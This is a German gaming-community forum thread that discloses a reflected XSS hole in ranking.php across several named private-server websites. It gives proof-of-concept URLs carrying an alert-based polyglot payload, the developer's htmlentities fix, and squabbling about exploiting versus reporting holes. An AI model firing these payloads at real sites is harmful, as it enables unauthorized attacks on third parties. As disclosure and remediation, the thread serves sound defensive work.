MMORPG Core - Deutsche Community für Online Rollenspiele - Powered by vBulletin

  • AAA
  • Aggressive
  • Alienated
  • Amazed
  • Amused
  • Angelic
  • Angry
  • Apelike
  • Artistic
  • Asleep
  • Balanced
  • Banhappy
  • Bashful
  • Bitchy
  • Blah
  • Bookworm
  • Bored
  • Breezy
  • Brooding
  • Busy
  • Buzzed
  • Chatty
  • Cheeky
  • Cheerful
  • Cloud 9
  • Cold
  • Coldturkey
  • Confused
  • Cool
  • Crappy
  • Creative
  • Curious
  • Cynical
  • Daring
  • Dead
  • Depressed
  • Devilish
  • Disagree
  • Doh
  • Doubtful
  • Dramaqueen
  • Dreaming
  • Drunk
  • Elated
  • Energetic
  • Fiendish
  • Fine
  • Flirty
  • Gloomy
  • Goofy
  • Grumpy
  • Happy
  • Horny
  • Hot
  • Hungover
  • In Love
  • Innocent
  • Inpain
  • Insomnious
  • Inspired
  • Lonely
  • Lucky
  • Lurking
  • Mellow
  • Mischievious
  • Mondayblues
  • Musical
  • Nerdy
  • Notamused
  • Notworthy
  • Paranoid
  • Pensive
  • Predatory
  • Procrastinating
  • Psychedelic
  • Question
  • Relaxed
  • Roflmao
  • Sad
  • Scared
  • Scurvy
  • Shocked
  • Sick
  • Sleepy
  • Sluggish
  • Sneaky
  • Snobbish
  • Spaced
  • Spooky
  • Sporty
  • Starving
  • Stressed
  • Sunshine
  • Sweettooth
  • Thinking
  • Tired
  • Torn
  • Twisted
  • Veggedout
  • Volatile
  • Woot
  • Worried
  • Yeehaw
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • DDos
  • Tweet   
    Seite 1 von 2 12 LetzteLetzte
    Ergebnis 1 bis 15 von 20
    1. #1
      Top Poster
       
      Avatar von dennisdra
      Registriert seit
      Sep 2009
      Ort
      Leverkusen
      Beiträge
      613
      Danke
      365
      Danke erhalten: 67

      Standard [Hinweis] XSS-Lücke in Surako's Websites

      Die Werbung stört? Registriere dich hier!
      Guten Abend liebe MCoreCommunity,

      ich wollte euch nur drauf hinweisen, das in sämtlichen Homepages von Stefan Pfeifer (Surako) eine XSS-Lücke besteht.

      Diese befindet sich im Ranking:

      /ranking.php?job=

      Ich habe Stefan drauf hingewiesen, aber anscheinend wurden noch nicht alle Kunden informiert.

      Hier als Beispiel:
      Revolution of Fire:
      Code:
      http://revolution-of-fire.eu/ranking.php?job=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>
      Und:
      Legends of Ardunia
      Code:
      http://www.legendsofardunia.de/ranking.php?job=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>
      Code:
      http://sapphire-flyff.de/ranking.php?job=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))
      Bis auf die Website von Insanity Flyff sind alle Websites vom ihm betroffen.
      Ich empfehle euch es zu fixen.
      MfG


    2. Das folgende Mitglied bedankt sich bei dennisdra für diesen Beitrag:

      eppo12 (10.02.12)

    3. #2
      Core Freak!
      Creative
       
      Avatar von Airdevil
      Registriert seit
      Jun 2009
      Ort
      In nem Haus? O.o
      Beiträge
      4,022
      Danke
      463
      Danke erhalten: 455

      Standard

      Ich würde nochmal nachdenken, an wen du diesen Text schreibst.


      ~ Why am I different? ~

    4. Die folgenden 2 Mitglieder bedankten sich bei Airdevil für diesen Beitrag:

      dennisdra (10.02.12), Yaano (10.02.12)

    5. #3
      Top Poster
       
      Avatar von dennisdra
      Registriert seit
      Sep 2009
      Ort
      Leverkusen
      Beiträge
      613
      Danke
      365
      Danke erhalten: 67

      Standard

      Was meinst du damit?
      Es ist an die User hier gerichtet, die die HP von Stefan usen.


    6. #4
      Core Freak!
      DDos
       
      Avatar von Surako
      Registriert seit
      Apr 2009
      Beiträge
      1,232
      Danke
      266
      Danke erhalten: 389

      Standard

      Fix

      Folgendes in der Ranking Datei suchen:
      PHP-Code:
              if(isset($_GET['job']) && !empty($_GET['job'])) {
                  echo 
      '<option value="'.$_GET['job'].'">'.getjob($_GET['job']).'</option>';
              } 
      und mit folgendem Code ersetzen:
      PHP-Code:
              if(isset($_GET['job']) && !empty($_GET['job'])) {
                  echo 
      '<option value="'.htmlentities($_GET['job']).'">'.htmlentities(getjob($_GET['job'])).'</option>';
              } 

    7. Die folgenden 2 Mitglieder bedankten sich bei Surako für diesen Beitrag:

      dennisdra (10.02.12), Valron (10.02.12)

    8. #5
      Core Freak!
      DDos
       
      Avatar von Crasy
      Registriert seit
      Sep 2009
      Ort
      ~~
      Beiträge
      1,429
      Danke
      74
      Danke erhalten: 263

      Standard

      Ich finds geil, du Postest ne XSS Lücke ( Die du netmal selbst gefunden hast ) anstat die knall hart aus zu nutzen..

      Würdest du auf Offi HP eine Lücke Finden ( eFlyff hat eine im Login ), würdest du bestimmt keine Mail schreiben und sagen "Ey ihr habt ne Lücke ufer HP", sondern würdest sie Ausnutzen, also was soll das ganze hier?

      Willst Fame? Thanks?..

      Sorry aber ich rall net why.


    9. #6
      Top Poster
       
      Avatar von dennisdra
      Registriert seit
      Sep 2009
      Ort
      Leverkusen
      Beiträge
      613
      Danke
      365
      Danke erhalten: 67

      Standard

      Ich finds geil, du Postest ne XSS Lücke ( Die du netmal selbst gefunden hast ) anstat die knall hart aus zu nutzen..
      1. Ich hab sie selber gefunden, also STFU
      Würdest du auf Offi HP eine Lücke Finden ( eFlyff hat eine im Login ), würdest du bestimmt keine Mail schreiben und sagen "Ey ihr habt ne Lücke ufer HP", sondern würdest sie Ausnutzen, also was soll das ganze hier?
      Offi ist was anderes, kannst nicht mit ner Community die sich "eigentlich" gegenseitig helfen sollte, vergleichen.

      Willst Fame? Thanks?..
      Ich will das solche Kiddies wie du nicht auf dumme Gedanken kommen.

      Und die XSS-Lücke hier auf M-Core, die hab ich vorhin durch Zufall entdeckt, [ironie on]hm ich glaub ich nutzt sie aus damit ich M-Core kaputt mach[/ironie off]


    10. Die folgenden 3 Mitglieder bedankten sich bei dennisdra für diesen Beitrag:

      Lalox3 (22.02.12), Legendary (22.02.12), ~Kevin~ (23.04.12)

    11. #7
      Core
       

      Registriert seit
      Aug 2010
      Beiträge
      465
      Danke
      260
      Danke erhalten: 26

      Standard

      Wie findet man Sicherheitslücken eigentlich raus?
      mfG.

    12. #8
      Core Freak!
      DDos
       
      Avatar von Crasy
      Registriert seit
      Sep 2009
      Ort
      ~~
      Beiträge
      1,429
      Danke
      74
      Danke erhalten: 263

      Standard

      Zitat Zitat von dennisdra [Um Links zu sehen registriere dich bitte. Klicke hier.]
      1. Ich hab sie selber gefunden, also STFU


      Offi ist was anderes, kannst nicht mit ner Community die sich "eigentlich" gegenseitig helfen sollte, vergleichen.



      Ich will das solche Kiddies wie du nicht auf dumme Gedanken kommen.

      Und die XSS-Lücke hier auf M-Core, die hab ich vorhin durch Zufall entdeckt, [ironie on]hm ich glaub ich nutzt sie aus damit ich M-Core kaputt mach[/ironie off]
      Naja, finds nur Komisch das einer, der im Source soviel Hirn hat wie Yannick, und echt nichts ohne Hilfe schafft, ne XSS Lücke findet.

      Un jemand wie ich auf Dumme Ideen? Klar, ich kann ja soviel mit Anfangen P Server Down zu legen, würd ich das wirklich wollen, hät ich euch auf so manche SQL Lücke in der Source bereits hingewiesen, also Fresse, k?

      Finds nur echt ken Sinn.

      @Extension: Suchen?..


    13. #9
      Core
       

      Registriert seit
      Aug 2010
      Beiträge
      465
      Danke
      260
      Danke erhalten: 26

      Standard

      @Crasy Ja das weiß ich, aber wie? Gibt es dafür bestimmte Tools?
      mfG.

    14. #10
      Core Freak!
      DDos
       
      Avatar von Crasy
      Registriert seit
      Sep 2009
      Ort
      ~~
      Beiträge
      1,429
      Danke
      74
      Danke erhalten: 263

      Standard

      Zitat Zitat von Extension [Um Links zu sehen registriere dich bitte. Klicke hier.]
      @Crasy Ja das weiß ich, aber wie? Gibt es dafür bestimmte Tools?
      Naja, mehr Testen, wobei Stefans HP teilweiße alle Public sind iwo, dann hast ja praktisch den "Source" davon und kanst so auch Lücken finden indem du nach Fehlern suchst.


    15. Das folgende Mitglied bedankt sich bei Crasy für diesen Beitrag:

      Extension (10.02.12)

    16. #11
      Core
      Daring
       
      Avatar von Grandcore
      Registriert seit
      Apr 2011
      Ort
      Bei mama =)
      Beiträge
      460
      Danke
      108
      Danke erhalten: 54

      Standard

      Ja klar gibts Tools dafür... google doch mal nach Lückenfinder ._.
      Edit: @Extension: XDDDDDDDDDDDDDD

    17. #12
      Core
       

      Registriert seit
      Aug 2010
      Beiträge
      465
      Danke
      260
      Danke erhalten: 26

      Standard

      Tue ich schon paar seit einer Zeit, finde aber nichts. Kann mir evtl. jemand eins empfehlen?
      mfG.

    18. #13
      Weiter so!
       

      Registriert seit
      Jul 2009
      Beiträge
      204
      Danke
      11
      Danke erhalten: 23

      Standard

      <ragemode>@Crasy: Könntest du ein EINZIGES Mal deinen Mund mit dem Scheiß von wegen "ICH BIN GOOOOOOTTT ÜBERPROOOO 1337" lassen? Du musst doch echt nur schräge Gedanken haben, dass du die ganze Zeit auf anderen Leuten rumhacken musst und ihnen einreden musst, dass sie minderwertig wären...</ragemode>

    19. Die folgenden 8 Mitglieder bedankten sich bei iXDe für diesen Beitrag:

      Bruce (22.02.12), dennisdra (10.02.12), jopsi (15.02.12), Lalox3 (22.02.12), Legendary (11.02.12), Sedrika (10.02.12), Yaano (10.02.12), ~Kevin~ (23.04.12)

    20. #14
      Top Poster
      DDos
       
      Avatar von Killerooo
      Registriert seit
      Dec 2009
      Beiträge
      629
      Danke
      52
      Danke erhalten: 105

      Standard

      Acunetix, es gibt keine lücke im eflyff login und der src hat auch keine sql lücken mehr.
      Die einzige die bekannt war wurd gefixxt und der fixx releast.

    21. #15
      Core Freak!
      DDos
       
      Avatar von Crasy
      Registriert seit
      Sep 2009
      Ort
      ~~
      Beiträge
      1,429
      Danke
      74
      Danke erhalten: 263

      Standard

      Zitat Zitat von Killerooo [Um Links zu sehen registriere dich bitte. Klicke hier.]
      Acunetix, es gibt keine lücke im eflyff login und der src hat auch keine sql lücken mehr.
      Die einzige die bekannt war wurd gefixxt und der fixx releast.
      Gibt es, schau selbst. :)

      Ach, und ich Gott? Rofl, ich würd mich ohne paar leute mit dem Scheiß netmal beschäftigen, ilold.

      Ich Schreibe meist nur Darunter, weil ich es einfach nur Crap Finde was machen, und hab ich jemals behauptet das ich "Gott" bin? ne? ey sorry aber wenn ihr euer Hirn nicht mal Logisch einsetzen könnt, sorry aber tut ihr mir leid, das hat nichts damit zutun das ich x weiß oder so, frag mich mal iwas anderes als das, und ich geb dir ne Antwort die Falsch ist, bzw ich will damit sagen: TUT MIR LEID DAS ICH MICH MIT DEM GEBIET BESCHÄFTIGE ALS WIE DEN GANZEN TAG ÜBERALL MAL RUM ZU SCHWIRREN.

      Hi. :)


    Seite 1 von 2 12 LetzteLetzte

    Lesezeichen

    Berechtigungen

    • Neue Themen erstellen: Nein
    • Themen beantworten: Nein
    • Anhänge hochladen: Nein
    • Beiträge bearbeiten: Nein
    •